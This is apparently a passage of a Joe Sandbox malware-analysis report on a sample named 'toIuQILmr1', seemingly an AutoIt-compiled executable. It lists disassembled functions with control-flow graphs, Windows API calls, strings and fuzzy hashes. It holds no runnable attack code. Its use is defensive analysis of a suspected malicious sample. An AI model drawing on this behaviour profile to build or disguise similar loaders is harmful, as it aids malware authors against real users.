                                          • Instruction Fuzzy Hash: D121C0B1911318AFDB14DFA6E889BDEBBF4FB08711F00452BFA10B62A0D7B145488F95
                                          Function 01153588 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1016 1153588-11535da call 1153488 CreateFileW 1019 11535e3-11535f0 1016->1019 1020 11535dc-11535de 1016->1020 1023 1153603-115361a VirtualAlloc 1019->1023 1024 11535f2-11535fe 1019->1024 1021 115373c-1153740 1020->1021 1025 1153623-1153649 CreateFileW 1023->1025 1026 115361c-115361e 1023->1026 1024->1021 1028 115366d-1153687 ReadFile 1025->1028 1029 115364b-1153668 1025->1029 1026->1021 1030 1153689-11536a6 1028->1030 1031 11536ab-11536af 1028->1031 1029->1021 1030->1021 1032 11536b1-11536ce 1031->1032 1033 11536d0-11536e7 WriteFile 1031->1033 1032->1021 1036 1153712-1153737 CloseHandle VirtualFree 1033->1036 1037 11536e9-1153710 1033->1037 1036->1021 1037->1021
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 011535CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                          • Instruction ID: ee5315d1df14937914d873b0fdbed06b4a61453177cc85cd190a15a465826940
                                          • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                          • Instruction Fuzzy Hash: FA511775A50249FBEB64DFA4CC49FDE7778BF48740F108508FA2AEB280DB7496408B60
                                          Function 00DD73E5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1046 dd73e5-dd7405 call e01b90 1049 dd740b-dd7438 call dd48ae call df09d5 call dd716b call dd69ca 1046->1049 1050 e0ee4b-e0eeb4 call df3020 7516D0D0 1046->1050 1056 e0eeb6 1050->1056 1057 e0eebd-e0eec6 call dd7d2c 1050->1057 1056->1057 1060 e0eecb 1057->1060 1060->1060
                                          APIs
                                          • _memset.LIBCMT ref: 00E0EE62
                                          • 7516D0D0.COMDLG32(?), ref: 00E0EEAC
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                            • Part of subcall function 00DF09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF09F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NamePath$7516FullLong_memset
                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                          • API String ID: 3926756254-1954568251
                                          • Opcode ID: 2a1725a1467d156c298680697ead5bda8bf45a5b5fcd771d471a2e7b127ff9c7
                                          • Instruction ID: 3e42589cfcc196b8a8274dc7ec2e4958414260c66298947d8ece5ddd5006e569
                                          • Opcode Fuzzy Hash: 2a1725a1467d156c298680697ead5bda8bf45a5b5fcd771d471a2e7b127ff9c7
                                          • Instruction Fuzzy Hash: E2218171A0025C9BCB159F94C845BFE7BF99F49314F04805BE509B7382DBB4998A8FB1
                                          Function 00DD39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1075 dd39e7-dd3a57 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD3A15
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3A36
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DD3A4A
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DD3A53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 1ed7a3bb1856d81ad4e8072e535e0d2f8a8679c10627d8c0a1939e5b3093264b
                                          • Instruction ID: 3448143d347cb0a1316ea24cb7e9027df1b38bbe57fdaa0f68f84d2073dfa044
                                          • Opcode Fuzzy Hash: 1ed7a3bb1856d81ad4e8072e535e0d2f8a8679c10627d8c0a1939e5b3093264b
                                          • Instruction Fuzzy Hash: DAF0D471641290BEEA311B27AC49E672E7DE7CAF51B00412BFA04B61B0C6A61859DAB0
                                          Function 00DD410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1076 dd410d-dd4123 1077 dd4129-dd413e call dd7b76 1076->1077 1078 dd4200-dd4204 1076->1078 1081 dd4144-dd4164 call dd7d2c 1077->1081 1082 e0d5dd-e0d5ec LoadStringW 1077->1082 1085 e0d5f7-e0d60f call dd7c8e call dd7143 1081->1085 1086 dd416a-dd416e 1081->1086 1082->1085 1095 dd417e-dd41fb call df3020 call dd463e call df2ffc Shell_NotifyIconW call dd5a64 1085->1095 1098 e0d615-e0d633 call dd7e0b call dd7143 call dd7e0b 1085->1098 1088 dd4205-dd420e call dd81a7 1086->1088 1089 dd4174-dd4179 call dd7c8e 1086->1089 1088->1095 1089->1095 1095->1078 1098->1095
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E0D5EC
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • _memset.LIBCMT ref: 00DD418D
                                          • _wcscpy.LIBCMT ref: 00DD41E1
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DD41F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: 7a6e08f6113983b5753ede94f0fbb4c7043e05c96f92a29aa44b0d357427f111
                                          • Instruction ID: 96f223edf948a3e02e9e4b39ee395476801b368e581457323143df8d0b9d4661
                                          • Opcode Fuzzy Hash: 7a6e08f6113983b5753ede94f0fbb4c7043e05c96f92a29aa44b0d357427f111
                                          • Instruction Fuzzy Hash: 7E31AD71008304AFD721EB60DC46BEB77ECAF54304F104A1BF599A22A1EB70A648C7B6
                                          Function 00DF564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction ID: 90518300f677c26a8ca49ae4fdd0fc9f61d91d7abb5f84b2b8d926655cf5f8d5
                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction Fuzzy Hash: 1951B230A00B0DDBDB249F69E88467E77A1AF40320F2AC729FB35962D8D7709D518B60
                                          Function 00DD69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4F6F
                                          • _free.LIBCMT ref: 00E0E68C
                                          • _free.LIBCMT ref: 00E0E6D3
                                            • Part of subcall function 00DD6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DD6D0D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 8290220c052d22404430c24df27c19001de81a1936a94fb9c6f8d580758cce05
                                          • Instruction ID: c02ed364f655472c363ec0b882f813144d8af75efb8727a3257abc3b4c673d74
                                          • Opcode Fuzzy Hash: 8290220c052d22404430c24df27c19001de81a1936a94fb9c6f8d580758cce05
                                          • Instruction Fuzzy Hash: D1917A71910219AFCF14EFA4DC919EDBBB4FF18314F14586AE815BB3A1EB31A944CB60
                                          Function 01155058 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01154F48: Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011551CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: H9KFVTFG66LQGAQQO3DJKC1LWA85
                                          • API String ID: 2694422964-3168977971
                                          • Opcode ID: c32f09c2ec4a4f8d51032fa737d7cfb896d4e9bc6c648bafcc9ef62b0a8fb45b
                                          • Instruction ID: a83c6998e373de8d80125211f29d6da3c33e11a244fb537e96f34acd254f77b6
                                          • Opcode Fuzzy Hash: c32f09c2ec4a4f8d51032fa737d7cfb896d4e9bc6c648bafcc9ef62b0a8fb45b
                                          • Instruction Fuzzy Hash: 2871A430D04288DBEF15DBB8C8487DEBB75AF15304F004199E6587B2C1D7BA5B45CBA6
                                          Function 00DDF8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF03D3
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF03DB
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF03E6
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF03F1
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF03F9
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF0401
                                            • Part of subcall function 00DE6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00DE62B4
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DDFB2D
                                          • OleInitialize.OLE32(00000000), ref: 00DDFBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 00E149F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                          • String ID: %
                                          • API String ID: 3094916012-2291192146
                                          • Opcode ID: ded58c0e1268e050582210d713a986520fe818d83d3504cdfb95ac71353928c0
                                          • Instruction ID: 6708499c2837ecbd5570ef226f8bdae3335089068eb09ca2952dec55cae0c6a4
                                          • Opcode Fuzzy Hash: ded58c0e1268e050582210d713a986520fe818d83d3504cdfb95ac71353928c0
                                          • Instruction Fuzzy Hash: 3A81B7B09042409FCB84EFBBE9526597BE4FB98348711956BD028E7362EB31840CCF62
                                          Function 00DD35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DD35A1,SwapMouseButtons,00000004,?), ref: 00DD35D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DD35A1,SwapMouseButtons,00000004,?,?,?,?,00DD2754), ref: 00DD35F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,00DD35A1,SwapMouseButtons,00000004,?,?,?,?,00DD2754), ref: 00DD3617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 1291c8d4b67c50f70777b2e711532b84b0c7e9702134fb1e4c8b013e7190d827
                                          • Instruction ID: 8742b17b883e9a40efdaba182e4c62ff1299ba80c7c46e370a51fac746c03fb8
                                          • Opcode Fuzzy Hash: 1291c8d4b67c50f70777b2e711532b84b0c7e9702134fb1e4c8b013e7190d827
                                          • Instruction Fuzzy Hash: 49114575610208FFDB208F65DC80EAFBBB8EF04740F04886AE805E7310E271DE449BA1
                                          Function 00E397E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD5045: _fseek.LIBCMT ref: 00DD505D
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AAE
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AC1
                                          • _free.LIBCMT ref: 00E3992C
                                          • _free.LIBCMT ref: 00E39933
                                          • _free.LIBCMT ref: 00E3999E
                                            • Part of subcall function 00DF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DF9C64), ref: 00DF2FA9
                                            • Part of subcall function 00DF2F95: GetLastError.KERNEL32(00000000,?,00DF9C64), ref: 00DF2FBB
                                          • _free.LIBCMT ref: 00E399A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                          • Instruction ID: e965bc330dbb77323a0de7e6da3955d1c6df679637be9b2c815203815ea8dcda
                                          • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                          • Instruction Fuzzy Hash: 295150B1904218AFDF249F64DC45AAEBBB9EF48314F1044AEF609A7341DB715E80CF69
                                          Function 00DF493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction ID: d1415dc369f92b450b351ac938ac4afca48ac8eb710ac1d431d9948ac37a6103
                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction Fuzzy Hash: 8141C57070060E9BDB188E69C88097F77A6EF80364B2AC13DEA55C7650D770DD408B74
                                          Function 00DD4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/$EA06
                                          • API String ID: 4104443479-182974850
                                          • Opcode ID: 24ce06fc4974b1506e28f3f95b320af8aa33350e390b502a7d60a70513ef8ef3
                                          • Instruction ID: d1e75f288174bd9a5714eef97a841a4c0a915b38a07f37f9ed42e18fc2dab237
                                          • Opcode Fuzzy Hash: 24ce06fc4974b1506e28f3f95b320af8aa33350e390b502a7d60a70513ef8ef3
                                          • Instruction Fuzzy Hash: 3E414C61A041587BDF215B64DC91BBE7FA6EF45300F6C4067F882AB386C671DD8487B1
                                          Function 00E3901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 87862bf1e1e164ef6e8179e8b10cd36975ac6276b135bd8e4540f1895ffd60a4
                                          • Instruction ID: 4156e01fd4a9967cd1a442edb66db421670807d247310775fcdfcd7cb5c48899
                                          • Opcode Fuzzy Hash: 87862bf1e1e164ef6e8179e8b10cd36975ac6276b135bd8e4540f1895ffd60a4
                                          • Instruction Fuzzy Hash: 6501F971804218BEDB28C6A8D81AEFE7BF8DB01311F00819BF652D2181E5B5A604CB70
                                          Function 00DF0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF594C: __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DF594C: __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DF594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          • std::exception::exception.LIBCMT ref: 00DF102C
                                          • __CxxThrowException@8.LIBCMT ref: 00DF1041
                                            • Part of subcall function 00DF87DB: RaiseException.KERNEL32(?,?,00000000,00E8BAF8,?,00000001,?,?,?,00DF1046,00000000,00E8BAF8,00DD9FEC,00000001), ref: 00DF8830
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
